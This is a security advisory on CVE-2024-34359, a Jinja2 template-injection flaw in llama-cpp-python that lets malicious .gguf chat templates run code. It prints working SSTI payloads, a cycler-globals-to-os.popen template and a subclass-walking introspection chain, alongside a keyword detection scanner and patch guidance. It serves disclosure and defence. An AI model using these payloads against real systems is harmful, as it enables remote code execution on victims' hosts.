CVE-2024-34359 Overview
CVE-2024-34359 is a Server-Side Template Injection (SSTI) vulnerability affecting llama-cpp-python, the Python bindings for the llama.cpp large language model framework. The vulnerability exists in how the library processes chat templates from .gguf model files, allowing attackers to achieve remote code execution through maliciously crafted model metadata.
The Llama class in llama.py loads chat templates from .gguf file metadata and passes them to Jinja2ChatFormatter.to_chat_handler(), which compiles them with an unsandboxed jinja2.Environment. Because the environment is unsandboxed, attackers can inject malicious Jinja2 template code that executes arbitrary commands when the template is rendered during chat interactions.
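In simplified form, the vulnerable flow can be sketched as follows. The class below is a condensed illustration, not the library's exact source; the gguf metadata key `tokenizer.chat_template` is where the template string actually lives:

```python
from jinja2 import Environment  # plain, unsandboxed environment -- the crux of the bug

# Condensed illustration of the pre-patch flow in llama-cpp-python.
class Jinja2ChatFormatterSketch:
    def __init__(self, template: str):
        # Pre-patch behavior: a plain Environment places no restriction on
        # attribute access, so template code can reach Python internals.
        self._template = Environment().from_string(template)

    def format(self, messages):
        return self._template.render(messages=messages)

# In the real library, this string comes straight from attacker-controllable
# .gguf metadata (key "tokenizer.chat_template").
untrusted_template = (
    "{% for m in messages %}{{ m['role'] }}: {{ m['content'] }}\n{% endfor %}"
)
formatter = Jinja2ChatFormatterSketch(untrusted_template)
print(formatter.format([{"role": "user", "content": "hi"}]))
```

A benign template renders as expected; the problem is that a hostile template passes through the same unrestricted code path.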
Critical Impact
Attackers can achieve remote code execution by distributing malicious .gguf model files containing crafted Jinja2 payloads in their metadata. When users load these poisoned models, arbitrary code executes on the host system with the privileges of the running process.
Affected Products
- llama-cpp-python versions prior to 0.2.72 (the release containing the fix)
- Applications using llama-cpp-python to load untrusted .gguf model files
- AI/ML pipelines that automatically process user-supplied or third-party model files
Discovery Timeline
- 2024-05-14 - CVE-2024-34359 published to NVD
- 2024-11-21 - Last updated in NVD database
Technical Details for CVE-2024-34359
Vulnerability Analysis
The vulnerability stems from a fundamental security oversight in how llama-cpp-python handles Jinja2 template processing. The library extracts chat template strings from the metadata section of .gguf model files and processes them through Jinja2's template engine without implementing any sandboxing mechanisms.
Jinja2 templates are powerful and can access Python objects, call methods, and traverse object hierarchies. When an attacker controls the template content, they can craft payloads that escape the template context and execute arbitrary Python code. This is a well-known attack vector that requires careful sandboxing when processing untrusted templates.
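This escape can be demonstrated directly against an unsandboxed environment. The payload below is a well-known public Jinja2 SSTI pattern: `cycler` is one of Jinja2's default template globals, and the module that defines it (jinja2.utils) imports os, so the function's `__globals__` expose the os module. A harmless `echo` stands in for a real command:

```python
from jinja2 import Environment

env = Environment()  # no sandboxing, as in the vulnerable code path

# Probe: if template expressions evaluate at all, {{ 7 * 7 }} renders as 49.
assert env.from_string("{{ 7 * 7 }}").render() == "49"

# Escalation: 'cycler' is a default Jinja2 global; its defining module
# (jinja2.utils) imports os, so the function's __globals__ expose os.
payload = "{{ cycler.__init__.__globals__.os.popen('echo pwned').read() }}"
print(env.from_string(payload).render())  # executes the shell command
```

Any template rendered by an unsandboxed environment can therefore run arbitrary code with the privileges of the host process.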
The attack surface is particularly concerning in the AI/ML ecosystem where model sharing is common. Users frequently download models from community repositories, model hubs, and third-party sources. A malicious actor could distribute seemingly legitimate .gguf models containing weaponized chat templates.
Root Cause
The root cause is the use of an unsandboxed jinja2.Environment when parsing chat templates from model metadata. The Jinja2ChatFormatter class directly processes template strings without restricting access to dangerous Python objects, built-in functions, or module imports. This violates the security principle of never trusting user-controlled input, especially when that input is interpreted as executable code.
CWE-76 (Improper Neutralization of Equivalent Special Elements) accurately categorizes this vulnerability, as the application fails to properly neutralize Jinja2 template syntax that can be interpreted as code execution commands.
Attack Vector
The attack is network-based and requires user interaction—specifically, a victim must load a malicious .gguf model file. The attack flow proceeds as follows:
- Attacker crafts a .gguf model file with a malicious Jinja2 template embedded in its metadata
- The poisoned model is distributed through model sharing platforms, social engineering, or supply chain compromise
- Victim downloads and loads the model using llama-cpp-python
- During initialization, the Llama class extracts the chat template from metadata
- The template is passed to Jinja2ChatFormatter without sandboxing
- When the chat handler is invoked (during prompt construction), the malicious template renders and executes arbitrary code
Jinja2 SSTI payloads typically leverage Python's object introspection capabilities to access dangerous classes like subprocess.Popen or os.system. A carefully constructed payload can chain through __mro__, __subclasses__, and __globals__ to reach code execution primitives.
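The chain described above can be reproduced in plain Python, outside any template, to show why these dunder attributes are dangerous. The pivot class used here (warnings.catch_warnings) is one common public choice, not anything specific to llama-cpp-python:

```python
# Reproducing the introspection chain: from a bare tuple to a shell command.
import warnings  # guarantees warnings.catch_warnings is loaded in the process

base = ().__class__.__mro__[-1]      # <class 'object'>
subclasses = base.__subclasses__()   # every class currently loaded

# Pick a class whose defining module's globals lead back to os.
cw = next(c for c in subclasses if c.__name__ == "catch_warnings")
os_mod = cw.__init__.__globals__["sys"].modules["os"]

print(os_mod.popen("echo reached-os").read())  # code execution primitive
```

Inside a Jinja2 expression the same walk is written with `|attr(...)` filters or plain attribute access, but the mechanism is identical.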
For technical details on the vulnerability mechanism and patch implementation, refer to the GitHub Security Advisory GHSA-56xg-wfcc-g829.
Detection Methods for CVE-2024-34359
Indicators of Compromise
- Unusual process spawning from Python processes running llama-cpp-python
- Network connections initiated by model loading processes to unexpected destinations
- Unexpected file system modifications during or after model loading
- Presence of .gguf files with suspiciously large or complex metadata sections
- Error logs showing Jinja2 template rendering failures with unusual template content
Detection Strategies
- Monitor for child processes spawned by Python applications using llama-cpp-python
- Implement file integrity monitoring on directories where model files are stored
- Analyze .gguf model files for suspicious metadata content before loading
- Use behavioral analysis to detect anomalous activity during model initialization
- Deploy endpoint detection and response (EDR) solutions to identify code execution from template engines
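One way to implement the metadata-analysis step above is a naive byte-level scan for introspection tokens that legitimate chat templates have no reason to contain. This is a heuristic sketch, not a real GGUF parser, and a determined attacker can evade it; treat a hit as a reason to reject, not a miss as proof of safety:

```python
import os
import tempfile

# Introspection tokens that legitimate chat templates rarely, if ever, need.
SUSPICIOUS = [b"__globals__", b"__subclasses__", b"__mro__",
              b"__builtins__", b"os.popen", b"subprocess"]

def scan_file(path):
    """Return the suspicious tokens found in the file's raw bytes."""
    with open(path, "rb") as f:
        data = f.read()
    return [tok.decode() for tok in SUSPICIOUS if tok in data]

# Demo on a stand-in file containing a malicious template fragment.
with tempfile.NamedTemporaryFile(delete=False, suffix=".gguf") as f:
    f.write(b"...{{ cycler.__init__.__globals__.os.popen('id') }}...")
    path = f.name

print(scan_file(path))  # ['__globals__', 'os.popen']
os.unlink(path)
```

A stricter screen would parse the GGUF metadata section properly and inspect only the `tokenizer.chat_template` value rather than the whole file.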
Monitoring Recommendations
- Enable verbose logging for llama-cpp-python applications to capture template processing events
- Implement network segmentation for systems that process untrusted model files
- Set up alerts for unexpected outbound connections from AI/ML workloads
- Review model file provenance and implement model signing/verification where possible
How to Mitigate CVE-2024-34359
Immediate Actions Required
- Update llama-cpp-python to version 0.2.72 or later immediately
- Audit all .gguf model files currently in use for suspicious metadata
- Restrict model loading to trusted sources only until patching is complete
- Isolate systems running vulnerable versions from production networks
- Review application logs for signs of exploitation
Patch Information
The vulnerability has been addressed in the llama-cpp-python repository. The fix implements proper sandboxing for Jinja2 template processing, preventing access to dangerous Python objects and methods during template rendering.
Apply the security patch by updating to llama-cpp-python 0.2.72 or later. The fix is available in commit b454f40a9a1787b2b5659cd2cb00819d983185df. For complete details, refer to the GitHub Security Advisory.
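The effect of the fix can be approximated with Jinja2's built-in sandbox (the patch moves template compilation to a sandboxed environment such as ImmutableSandboxedEnvironment). Under the sandbox, the dunder-walking payload fails with a SecurityError instead of executing:

```python
from jinja2.sandbox import ImmutableSandboxedEnvironment
from jinja2.exceptions import SecurityError

env = ImmutableSandboxedEnvironment()  # blocks unsafe attribute access
payload = "{{ cycler.__init__.__globals__.os.popen('id').read() }}"

try:
    env.from_string(payload).render()
    print("payload executed")  # should not happen
except SecurityError as exc:
    print("blocked:", exc)
```

Normal chat templates (loops over messages, string formatting) render unchanged under the sandbox, which is why the fix does not break legitimate models.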
Workarounds
- Only load .gguf models from trusted and verified sources
- Run llama-cpp-python in a sandboxed environment (containers, VMs) with minimal privileges
- Implement network isolation for systems processing untrusted models
- Disable or remove chat template functionality if not required for your use case
- Use application-level firewalls to restrict outbound connections from model processing workloads
# Update llama-cpp-python to the latest patched version
pip install --upgrade llama-cpp-python
# Verify the installed version includes the security fix
pip show llama-cpp-python | grep Version
# Run model processing in an isolated container with minimal privileges
docker run --rm --read-only --network=none -v /path/to/trusted/models:/models:ro llama-container